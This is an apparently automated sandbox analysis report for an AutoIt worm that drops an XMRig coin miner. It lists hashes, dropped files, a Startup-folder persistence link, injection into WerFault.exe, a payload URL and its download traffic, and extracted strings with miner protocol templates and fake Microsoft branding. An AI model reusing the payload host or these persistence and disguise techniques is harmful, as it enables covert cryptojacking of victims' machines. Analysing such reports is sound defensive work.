Worm.Win32.AutoItGen_641a95b805
Application.BitCoinMiner.QB (BitDefender), Trojan:Win32/Skeeyah.A!rfn (Microsoft), Trojan.Win32.Generic!BT (VIPRE), Trojan.Starter.7257 (DrWeb), Application.BitCoinMiner.QB (B) (Emsisoft), Artemis!641A95B80595 (McAfee), Trojan.Gen.2 (Symantec), Trojan.Win64.CoinMiner (Ikarus), Application.BitCoinMiner.QB (FSecure), Win32:Malware-gen (AVG), Win32:Malware-gen (Avast), Worm.Win32.AutoIt.FD, WormAutoItGen.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, Malware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 641a95b805951893259f5762ffb1894f
SHA1: c8fce7e3022e4ed8d09b5eaad92cdefafaa49312
SHA256: 83526226c2b4de1e327508d95eaedbf759df204b29e9934d734007044587c811
SSDeep: 49152:Sw80cTsjkWayN0MbyJBLY6rW/6tthk2UwZ0WGweuI9Ul:n8sjkZMbyJlY6rW/Ctu6A9U
Size: 2479104 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company:
Created at: 2017-07-06 16:27:46
Analyzed on: Windows7 SP1 32-bit
Summary:
Worm. A program that primarily replicates over networks or removable drives.
Payload
No specific payload has been found.
Process activity
The Worm creates the following process(es):
%original file name%.exe:3408
The Worm injects its code into the following process(es):
WerFault.exe:3552
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:3408 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Security.lnk (746 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut251C.tmp (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut2618.tmp (5681 bytes)
C:\ProgramData\System32\1.bat (1372 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut258A.tmp (2673 bytes)
C:\ProgramData\System32\system.exe (6441 bytes)
C:\ProgramData\System32\Security.exe (10161 bytes)
The Worm deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut251C.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut2618.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut258A.tmp (0 bytes)
Registry activity
The process WerFault.exe:3552 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Debug]
"ExceptionRecord" = "05 00 00 C0 00 00 00 00 00 00 00 00 35 2C 40 00"
[HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Debug\UIHandles]
"FirstLevelConsentDialog" = "Type: REG_QWORD, Length: 8"
[HKCU\Software\Microsoft\Windows\Windows Error Reporting\Debug\UIHandles]
"FirstLevelConsentDialog" = "Type: REG_QWORD, Length: 8"
Dropped PE files
| MD5 | File path |
|---|---|
| 25232ae561624279185dc0a4845d3872 | c:\ProgramData\System32\Security.exe |
| 230d64ed8cea7a93c78605a5bb139c5e | c:\ProgramData\System32\system.exe |
| 25232ae561624279185dc0a4845d3872 | c:\Users\All Users\System32\Security.exe |
| 230d64ed8cea7a93c78605a5bb139c5e | c:\Users\All Users\System32\system.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name:
Product Name:
Product Version: 3.3.14.2
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.1.0.0
File Description: SoftPortal
Comments: http://www.autoitscript.com/autoit3/
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 580910 | 581120 | 4.62736 | c2c2260508750422d20cd5cbb116b146 |
| .rdata | 585728 | 188686 | 188928 | 3.99304 | 4513b58651e3d8d87c81a396e5b2f1d1 |
| .data | 778240 | 36724 | 20992 | 0.830952 | c2de4a3d214eae7e87c7bfc06bd79775 |
| .rsrc | 815104 | 1657647 | 1657856 | 5.5429 | 1f4dee3dc229c8e9e180de56738d6226 |
| .reloc | 2473984 | 28976 | 29184 | 4.70119 | 1254908a9a03d2bcf12045d49cd572b9 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://porntovirt.ru/058/1.bat | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
HEAD /058/1.bat HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
Host: porntovirt.ru
HTTP/1.1 200 OK
Last-Modified: Thu, 06 Jul 2017 13:26:51 GMT
Content-Type: application/x-msdownload
Content-Length: 28512
Date: Thu, 27 Jul 2017 07:23:29 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
GET /058/1.bat HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Thu, 06 Jul 2017 13:26:51 GMT
Range: bytes=0-4553
User-Agent: Microsoft BITS/7.5
Host: porntovirt.ru
HTTP/1.1 206 Partial Content
Last-Modified: Thu, 06 Jul 2017 13:26:51 GMT
Content-Type: application/x-msdownload
Content-Range: bytes 0-4553/28512
Content-Length: 4554
Date: Thu, 27 Jul 2017 07:23:34 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
GET /058/1.bat HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Thu, 06 Jul 2017 13:26:51 GMT
Range: bytes=4554-8949
User-Agent: Microsoft BITS/7.5
Host: porntovirt.ru
HTTP/1.1 206 Partial Content
Last-Modified: Thu, 06 Jul 2017 13:26:51 GMT
Content-Type: application/x-msdownload
Content-Range: bytes 4554-8949/28512
Content-Length: 4396
Date: Thu, 27 Jul 2017 07:23:36 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
GET /058/1.bat HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Thu, 06 Jul 2017 13:26:51 GMT
Range: bytes=8950-13674
User-Agent: Microsoft BITS/7.5
Host: porntovirt.ru
HTTP/1.1 206 Partial Content
Last-Modified: Thu, 06 Jul 2017 13:26:51 GMT
Content-Type: application/x-msdownload
Content-Range: bytes 8950-13674/28512
Content-Length: 4725
Date: Thu, 27 Jul 2017 07:23:37 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
GET /058/1.bat HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Thu, 06 Jul 2017 13:26:51 GMT
Range: bytes=13675-24390
User-Agent: Microsoft BITS/7.5
Host: porntovirt.ru
HTTP/1.1 206 Partial Content
Last-Modified: Thu, 06 Jul 2017 13:26:51 GMT
Content-Type: application/x-msdownload
Content-Range: bytes 13675-24390/28512
Content-Length: 10716
Date: Thu, 27 Jul 2017 07:23:38 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
GET /058/1.bat HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Thu, 06 Jul 2017 13:26:51 GMT
Range: bytes=24391-28511
User-Agent: Microsoft BITS/7.5
Host: porntovirt.ru
HTTP/1.1 206 Partial Content
Last-Modified: Thu, 06 Jul 2017 13:26:51 GMT
Content-Type: application/x-msdownload
Content-Range: bytes 24391-28511/28512
Content-Length: 4121
Date: Thu, 27 Jul 2017 07:23:39 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
The Worm connects to the servers at the following location(s):
.text
`.rdata
@.data
.rsrc
@.reloc
j.Yf;
r%f;M
j.Xf;
j.Zf;
PSSSSSSh
Gt.Ht$
.ku`8iu~fiu
kernel32.dll
?#%X.y
GetProcessWindowStation
operator
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
erroffset passed as NULL
POSIX collating elements are not supported
this version of PCRE is compiled without UTF support
PCRE does not support \L, \l, \N{name}, \U, or \usupport for \P, \p, and \X has not been compiled
this version of PCRE is not compiled with Unicode property support
\N is not supported in a class
RegDeleteKeyExW
advapi32.dll
Error text not found (please report)
WSOCK32.dll
VERSION.dll
WINMM.dll
COMCTL32.dll
MPR.dll
InternetCrackUrlW
HttpQueryInfoW
HttpOpenRequestW
HttpSendRequestW
FtpOpenFileW
FtpGetFileSize
InternetOpenUrlW
WININET.dll
PSAPI.DLL
IPHLPAPI.DLL
USERENV.dll
UxTheme.dll
GetProcessHeap
CreatePipe
GetWindowsDirectoryW
KERNEL32.dll
OpenWindowStationW
SetProcessWindowStation
CloseWindowStation
MapVirtualKeyW
EnumChildWindows
EnumWindows
VkKeyScanW
GetKeyState
GetKeyboardState
SetKeyboardState
GetAsyncKeyState
keybd_event
EnumThreadWindows
ExitWindowsEx
UnregisterHotKey
RegisterHotKey
GetKeyboardLayoutNameW
USER32.dll
SetViewportOrgEx
GDI32.dll
COMDLG32.dll
RegOpenKeyExW
RegCloseKey
RegCreateKeyExW
RegEnumKeyExW
RegDeleteKeyW
ADVAPI32.dll
ShellExecuteW
SHFileOperationW
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
GetCPInfo
zcÁ
n..GGHHH
n...GGHHH
n ....HGHHHH
n ....G.HHH
~~~~{~{{{{n!! ....HGHHHH
n!! .....HHHHHH
!!! ....GGHHH
!!"".....HHHHnv
"""...-.nv
.Gm,6:
Af%D/v
5f.Tf
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" language="*" processorArchitecture="*" publicKeyToken="6595b64144ccf1df"/>
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>;$;*;0;6;<;|;
=#=(=-=2=7===
3.44484<4@4
3&323^3|3
9 9$9(9,9?9
?#?'? ?/?3?7?;???
4"4&4*4.424
7)868=8=:
= =$=(=,=0=4=8=
0 0$0(0,00040
3"3(313]3
1!1%1)1-1115191=1
< <*<4<{<<$=4=8=<=
3 3(30383@3
/AutoIt3ExecuteScript
/AutoIt3ExecuteLine
CMDLINE
CMDLINERAW
>>>AUTOIT NO CMDEXECUTE<<<
FTPSETPROXY
GUICTRLRECVMSG
GUICTRLSENDMSG
GUIGETMSG
GUIREGISTERMSG
HOTKEYSET
HTTPSETPROXY
HTTPSETUSERAGENT
ISKEYWORD
MAPKEYS
MSGBOX
REGENUMKEY
SHELLEXECUTE
SHELLEXECUTEWAIT
TCPACCEPT
TCPCLOSESOCKET
TCPCONNECT
TCPLISTEN
TCPNAMETOIP
TCPRECV
TCPSEND
TCPSHUTDOWN
TCPSTARTUP
TRAYGETMSG
UDPBIND
UDPCLOSESOCKET
UDPOPEN
UDPRECV
UDPSEND
UDPSHUTDOWN
UDPSTARTUP
SendKeyDownDelay
SendKeyDelay
TCPTimeout
mscoree.dll
combase.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
789:;<=>?
APPSKEY
WINDOWSDIR
AUTOITEXE
HOTKEYPRESSED
%s (%d) : ==> %s.:
Line %d:
Line %d (File "%s"):
%s (%d) : ==> %s:
AutoIt script files (*.au3, *.a3x)
*.au3;*.a3x
All files (*.*)
KEYS
\\?\UNC\
04090000
%u.%u.%u.%u
0.0.0.0
Mddddd
"%s" (%d) : ==> %s:
\??\%s
GUI_RUNDEFMSG
AUTOITCALLVARIABLE%d
255.255.255.255
Keyword
AUTOIT.ERROR
Null Object assignment in FOR..IN loop
Incorrect Object type in FOR..IN loop
3, 3, 14, 2
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_USERS
%d/d/d
C:\ProgramData\System32\Security.exe
AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.
Missing operator in expression."Unbalanced brackets in expression.
Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.
0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.
Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.
Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.
3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.
Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.
String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.
10.9.14393.0
Windows Driver Host
3.3.14.2
conhost.exe_3804:
.text
`.data
.rsrc
@.reloc
GDI32.dll
USER32.dll
msvcrt.dll
ntdll.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
KERNEL32.dll
IMM32.dll
ole32.dll
OLEAUT32.dll
PutInputInBuffer: EventsWritten != 1 (0x%x), 1 expected
Invalid message 0x%x
InitExtendedEditKeys: Unsupported version number(%d)
Console init failed with status 0x%x
CreateWindowsWindow failed with status 0x%x, gle = 0x%x
InitWindowsStuff failed with status 0x%x (gle = 0x%x)
InitSideBySide failed create an activation context. Error: %d
GetModuleFileNameW requires more than ScratchBufferSize(%d) - 1.
GetModuleFileNameW failed %d.
Invalid EventType: 0x%x
Dup handle failed for %d of %d (Status = 0x%x)
Couldn't grow input buffer, Status == 0x%x
InitializeScrollBuffer failed, Status = 0x%x
CreateWindow failed with gle = 0x%x
Opening Font file failed with error 0x%x
\ega.cpi
NtReplyWaitReceivePort failed with Status 0x%x
ConsoleOpenWaitEvent failed with Status 0x%x
NtCreatePort failed with Status 0x%x
GetCharWidth32 failed with error 0x%x
GetTextMetricsW failed with error 0x%x
GetSystemEUDCRangeW: RegOpenKeyExW(%ws) failed, error = 0x%x
RtlStringCchCopy failed with Status 0x%x
Cannot allocate 0n%d bytes
|%SWj
O.fBf;
ReCreateDbcsScreenBuffer failed. Restoring to CP=%d
Invalid Parameter: 0x%x, 0x%x, 0x%x
ConsoleKeyInfo buffer is full
Invalid screen buffer size (0x%x, 0x%x)
SetROMFontCodePage: failed to memory allocation %d bytes
FONT.NT
Failed to set font image. wc=x, sz=(%x,%x)
Failed to set font image. wc=x sz=(%x, %x).
Failed to set font image. wc=x sz=(%x,%x)
FullscreenControlSetColors failed - Status = 0x%x
FullscreenControlSetPalette failed - Status = 0x%x
WriteCharsFromInput failed 0x%x
WriteCharsFromInput failed %x
RtlStringCchCopyW failed with Status 0x%x
CreateFontCache failed with Status 0x%x
FTPh
\>.Sj
GetKeyboardLayout
MapVirtualKeyW
VkKeyScanW
GetKeyboardState
UnhookWindowsHookEx
SetWindowsHookExW
GetKeyState
ActivateKeyboardLayout
GetKeyboardLayoutNameA
GetKeyboardLayoutNameW
_amsg_exit
_acmdln
ShipAssert
NtReplyWaitReceivePort
NtCreatePort
NtEnumerateValueKey
NtQueryValueKey
NtOpenKey
NtAcceptConnectPort
NtReplyPort
SetProcessShutdownParameters
GetCPInfo
conhost.pdb
%$%a%b%V%U%c%Q%W%]%\%[%
%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%
version="5.1.0.0"
name="Microsoft.Windows.ConsoleHost"
<requestedExecutionLevel
name="Microsoft.Windows.ConsoleHost.SystemDefault"
publicKeyToken="6595b64144ccf1df"
name="Microsoft.Windows.SystemCompatible"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
< =$>:>@>
2%2X2
%SystemRoot%
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\FullScreen
WindowSize
ColorTableu
ExtendedEditkeyCustom
ExtendedEditKey
Software\Microsoft\Windows\CurrentVersion
\ !:=/.<>;|&
%d/%d
cmd.exe
desktop.ini
\console.dll
%d/%d
6.1.7601.17641 (win7sp1_gdr.110623-1503)
CONHOST.EXE
Windows
Operating System
6.1.7601.17641
system.exe_1728:
.text
P`.data
.rdata
`@.eh_fram
0@.bss
.idata
.rsrc
/%X#H
3|$(3|$,1
%UUUU
UUUU%UUUU
3333333
pipe
libgcc_s_dw2-1.dll
libgcj-16.dll
"%s" hash self-test failed.
[%d-d-d d:d:d]%s %s%s
[%d-d-d d:d:d]
[%s:%u] getaddrinfo error: "%s"
{"id":%lld,"jsonrpc":"2.0","method":"keepalived","params":{"id":"%s"}}[%s:%u] DNS error: "%s"
[%s:%u] error: "%s", code: %lld
[%s:%u] unsupported method: "%s"
[%s:%u] login error code: %d
[%s:%u] JSON decode failed: "%s"
[%s:%u] read error: "%s"
{"id":%llu,"jsonrpc":"2.0","method":"login","params":{"login":"%s","pass":"%s","agent":"%s"}}[%s:%u] connect error: "%s"
{"id":%llu,"jsonrpc":"2.0","method":"submit","params":{"id":"%s","job_id":"%s","nonce":"%s","result":"%s"}}[01;36m%s:%d
[01;30m%s
use pool %s:%d %s
[01;37m%u
[31m"%s"
accepted (%lld/%lld) diff %u "%s" (%llu ms)
accepted (%lld/%lld) diff %u (%llu ms)
[01;37m%s:%d
[01;37m%d
new job from %s:%d diff %d
stratum tcp://
.nicehash.com
donate.xmrig.com
XMRig 2.0.0
%d.%d.%d
libuv/%s
libjansson/%s
%s: unsupported non-option argument '%s'
No pool URL supplied. Exiting.
userpass
-o, --url=URL URL of mining server
-O, --userpass=U:P username:password pair for mining server
-p, --pass=PASSWORD password for mining server
-k, --keepalive send keepalived for prevent timeout (need pool support)
--nicehash enable nicehash support
--print-time=N print hashrate report every N seconds
[01;36m%d
[01;37m, %s, av=%d, %sdonate=%d%%%s
* THREADS: %d, %s, av=%d, %sdonate=%d%%%s
[01;37mPOOL #%d:
[01;36m%s:%d
* POOL #%d: %s:%d
gcc/%d.%d.%d
2.0.0
[01;36mXMRig/%s
[01;37m libuv/%s%s
* VERSIONS: XMRig/%s libuv/%s%s
[01;37mHUGE PAGES: %s, %s
* HUGE PAGES: %s, %s
[01;37mCPU: %s (%d) %sx64 %sAES-NI
* CPU: %s (%d) %sx64 %sAES-NI
[01;36m%s
[22;36m%s %s
[01;36m%s H/s
speed 2.5s/60s/15m %s %s %s H/s max: %s H/s
0123456789;
%s/%s (Windows NT %lu.%lu
) libuv/%s
tX4Fr.rh.46Aw-wl-6
.eK9K\9.
%s near '%s'
%s near end of file
unable to decode byte 0x%x
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
NUL byte in object key not supported
duplicate object key
unable to open %s: %s
Unknown system error %d
EAFNOSUPPORT
EMSGSIZE
EPIPE
EPROTONOSUPPORT
ESPIPE
address family not supported
ai_family not supported
socket type not supported
operation canceled
illegal operation on a directory
socket operation on non-socket
operation not supported on socket
operation not permitted
broken pipe
protocol not supported
cannot send after transport endpoint shutdown
[%c%c%c] %-8s %p
1.12.0
!loop->wq_async.async_sent
((uv_shutdown_t*) req)->handle->type == UV_NAMED_PIPE
%s: (%d) %s
(%d) %s
src/win/pipe.c
pipe->flags & UV_HANDLE_CONNECTION
pipe->u.fd == -1 || pipe->u.fd > 2
req->pipeHandle == INVALID_HANDLE_VALUE
req->pipeHandle != INVALID_HANDLE_VALUE
handle->type == UV_NAMED_PIPE
hThread == handle->pipe.conn.readfile_thread
req->write_buffer.base
!(handle->flags & UV_HANDLE_PIPESERVER)
pipe->type == UV_NAMED_PIPE
pipe->flags & UV_HANDLE_READ_PENDING
!(handle->flags & UV_HANDLE_NON_OVERLAPPED_PIPE)
\\?\pipe\uv\%p-%lu
handle->pipe.serv.accept_reqs
handle->pipe.serv.accept_reqs[0].pipeHandle != INVALID_HANDLE_VALUE
avail >= sizeof(ipc_frame.header)
bytes == sizeof(ipc_frame.header)
ipc_frame.header.flags <= (UV_IPC_TCP_SERVER | UV_IPC_RAW_DATA | UV_IPC_TCP_CONNECTION)
avail - sizeof(ipc_frame.header) >= sizeof(ipc_frame.socket_info_ex)
bytes == sizeof(ipc_frame) - sizeof(ipc_frame.header)
handle->pipe.conn.remaining_ipc_rawdata_bytes >= bytes
handle->write_queue_size >= req->u.io.queued_bytes
handle->stream.conn.write_reqs_pending > 0
pipe->pipe.conn.eof_timer == NULL
!(pipe->flags & UV_HANDLE_NON_OVERLAPPED_PIPE)
pipe->pipe.conn.ipc_pid != -1
rfds.fd_count == 1
rfds.fd_array[0] == handle->socket
wfds.fd_count == 1
wfds.fd_array[0] == handle->socket
efds.fd_count == 1
efds.fd_array[0] == handle->socket
!(options->flags & ~(UV_PROCESS_DETACHED | UV_PROCESS_SETGID | UV_PROCESS_SETUID | UV_PROCESS_WINDOWS_HIDE | UV_PROCESS_WINDOWS_VERBATIM_ARGUMENTS))
src/win/tcp.c
server->flags & UV_HANDLE_TCP_SINGLE_ACCEPT
handle->type == UV_TCP
(tcp)->activecnt >= 0
!((tcp)->flags & UV__HANDLE_CLOSING)
handle->tty.rd.read_line_buffer.base != NULL
handle->tty.rd.read_line_buffer.len > 0
handle->u.fd == -1 || handle->u.fd > 2
!(handle->flags & UV_HANDLE_TTY_READABLE) || handle->tty.rd.read_raw_wait == NULL
src/win/udp.c
handle->type == UV_UDP
handle->send_queue_size >= req->u.io.queued_bytes
len > 0 && len < ARRAY_SIZE(key_name)
_ntdll.dll
kernel32.dll
powrprof.dll
0.0.0.0
0123456789
%u.%u.%u.%u
fdopt.data.stream->type == UV_NAMED_PIPE
!(fdopt.data.stream->flags & UV_HANDLE_CONNECTION)
!(fdopt.data.stream->flags & UV_HANDLE_PIPESERVER)
mode == (PIPE_READMODE_BYTE | PIPE_WAIT)
0.4.0
operator
operator
global constructors keyed to
global destructors keyed to
operator""
_matherr(): %s in %s(%g, %g) (retval=%g)
VirtualQuery failed for %d bytes at address %p
VirtualProtect failed with code 0x%x
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
unknown option -- %s
unknown option -- %c
option requires an argument -- %s
option requires an argument -- %c
Error cleaning up spin_keys for thread
once %p is %d
T%p %d %s
T%p %d V=%0X H=%p %s
Assertion failed: (%s), file %s, line %d
RWL%p %d %s
RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s
C%p %d %s
C%p %d V=%0X w=%ld %s
GCC: (Rev2, Built by MSYS2 project) 6.3.0
GCC: (Rev3, Built by MSYS2 project) 6.3.0
RegCloseKey
RegOpenKeyExW
ConnectNamedPipe
CreateIoCompletionPort
CreateNamedPipeA
CreateNamedPipeW
GetNamedPipeHandleStateA
PeekNamedPipe
SetNamedPipeHandleState
WaitNamedPipeW
_acmdln
_amsg_exit
MapVirtualKeyW
ADVAPI32.dll
IPHLPAPI.DLL
KERNEL32.dll
msvcrt.dll
PSAPI.DLL
USER32.dll
USERENV.dll
WS2_32.dll
<requestedExecutionLevel level="asInvoker"/>
<!--The ID below indicates application support for Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/><!--The ID below indicates application support for Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><!--The ID below indicates application support for Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><!--The ID below indicates application support for Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><!--The ID below indicates application support for Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>ntdll.dll
Cadvapi32.dll
%s\%.*s
\\?\UNC\
eHARDWARE\DESCRIPTION\System\CentralProcessor\%d
File: %ws, Line %u
tmsvcrt.dll
VVV.microsoft.com
0.8.2
Copyright (C) 2016-2017 VVV.microsoft.com
microsoft.exe
svchost.exe_3588:
.text
`.data
.rsrc
@.reloc
msvcrt.dll
API-MS-Win-Core-ProcessThreads-L1-1-0.dll
KERNEL32.dll
NTDLL.DLL
API-MS-Win-Security-Base-L1-1-0.dll
API-MS-WIN-Service-Core-L1-1-0.dll
API-MS-WIN-Service-winsvc-L1-1-0.dll
RPCRT4.dll
ole32.dll
ntdll.dll
_amsg_exit
RegCloseKey
RegOpenKeyExW
GetProcessHeap
svchost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Services.SvcHost"
<description>Host Process for Windows Services</description>
<requestedExecutionLevel
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\MgdSvchost
\PIPE\
Host Process for Windows Services
6.1.7600.16385 (win7_rtm.090713-1255)
svchost.exe
Windows
Operating System
6.1.7600.16385
WerFault.exe_3552:
.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
USER32.dll
msvcrt.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
IMM32.dll
wer.dll
COMCTL32.dll
faultrep.dll
Starting kernel vertical - %S
rundll32.exe
NtQueryInformationProcess failed with status: 0x%x
Reporting never started for process id %u
StringCchPrintf failed with 0x%x
NtWow64QueryInformationProcess64 failed with 0x%x
NtWow64ReadVirtualMemory64 failed with 0x%x
NtQueryInformationProcess failed with status 0x%x
WerpNtWow64QueryInformationProcess64 failed with status 0x%x
StringCchCopy failed with 0x%x
Invalid arg in %s
wdi.dll
dbgeng.dll
dbghelp.dll
SETUPAPI.dll
SHELL32.dll
VERSION.dll
WTSAPI32.dll
WerFault.pdb
_amsg_exit
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegEnumKeyExW
RegQueryInfoKeyW
GetProcessHeap
GetWindowsDirectoryW
RegDeleteKeyW
ReportEventW
RegOpenKeyW
RegSetKeyValueW
GetProcessWindowStation
EnumWindows
NtAlpcSendWaitReceivePort
NtAlpcConnectPort
ShipAssert
ntdll.dll
RegisterErrorReportingDialog
WerReportSubmit
WerReportAddFile
WerReportCreate
WerReportCloseHandle
WerReportSetUIOption
WerpGetReportConsent
WerpSetIntegratorReportId
WerpReportCancel
WerpAddRegisteredDataToReport
WerReportAddDump
WerpCreateIntegratorReportId
WerpSetReportFlags
WerpGetReportFlags
WerpIsTransportAvailable
WerReportSetParameter
WerpInitiateCrashReporting
version="1.0.0.0"
name="Microsoft.Windows.Feedback.Watson"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<asmv3:windowsSettings xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">
</asmv3:windowsSettings>
<requestedExecutionLevel
Microsoft\Windows\WindowsErrorReporting\WerFault
%s %s
Global\WerKernelVerticalReporting
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl
CrashDumpEnabled.Old
CrashDumpEnabled.New
%SystemRoot%\MEMORY.DMP
LiveKernelReports
Software\Microsoft\Windows\Windows Error Reporting\LiveKernelReports
LiveKernelReportsPath
BCCode=%x&BCP1=%p&BCP2=%p&BCP3=%p&BCP4=%p&OS Version=%u_%u_%u&Service Pack=%u_%u&Product=%u_%u
*WerKernelReporting
%SYSTEMROOT%\SYSTEM32\WerFault.exe -k -rq
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
SOFTWARE\Microsoft\Windows\Windows Error Reporting\KernelFaults\Queue
sysdata.xml
%s -k -q
SOFTWARE\Microsoft\Windows NT\CurrentVersion
<OSVER>%u.%u.%u %u.%u</OSVER>
<OSLANGUAGE>%u</OSLANGUAGE>
<ARCHITECTURE>%u</ARCHITECTURE>
<PRODUCTTYPE>%u</PRODUCTTYPE>
